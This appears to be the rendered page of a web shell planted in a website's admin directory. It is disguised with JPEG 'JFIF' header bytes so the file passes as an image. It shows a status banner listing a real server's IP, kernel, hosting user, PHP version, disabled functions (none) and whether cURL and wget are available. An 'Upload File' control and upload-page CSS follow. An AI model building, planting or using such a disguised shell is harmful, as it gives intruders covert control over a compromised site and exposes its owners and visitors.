���� JFIF fdasasfas213sdaf
Server IP : 77.37.115.250 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/saumasale.in/public_html/admin/ |
Upload File : |
*, *::after, *::before { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif; font-size: 1rem; line-height: 1.7; } main { display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; } .dropzone { display: flex; flex-direction: column; justify-content: center; align-items: center; border: dashed 3px #ccc; border-radius: 1rem; padding: 2rem; } .active { border: dashed 3px dodgerblue; } h3 { margin-top: 1rem; } .image-list { display: flex; flex-direction: column; margin-top: 1rem; gap: 1rem; width: 400px; } .image-list .image { display: flex; justify-content: space-between; gap: 1rem; } .image img { width: 128px; padding: 0.5rem; } /* upload button */ /* [type='file'] { border: 0; clip: rect(0, 0, 0, 0); height: 1px; overflow: hidden; padding: 0; position: absolute !important; white-space: nowrap; width: 1px; } [type='file'] + label { margin-top: 1rem; background-color: #0d6efd; border-radius: 4rem; color: #fff; cursor: pointer; display: inline-block; padding: 0.25rem 0.75rem; text-align: center; user-select: none; } [type='file']:focus + label, [type='file'] + label:hover { background-color: #0a58ca; color: #fff; } [type='file']:focus + label { outline: 1px dotted #fff; } */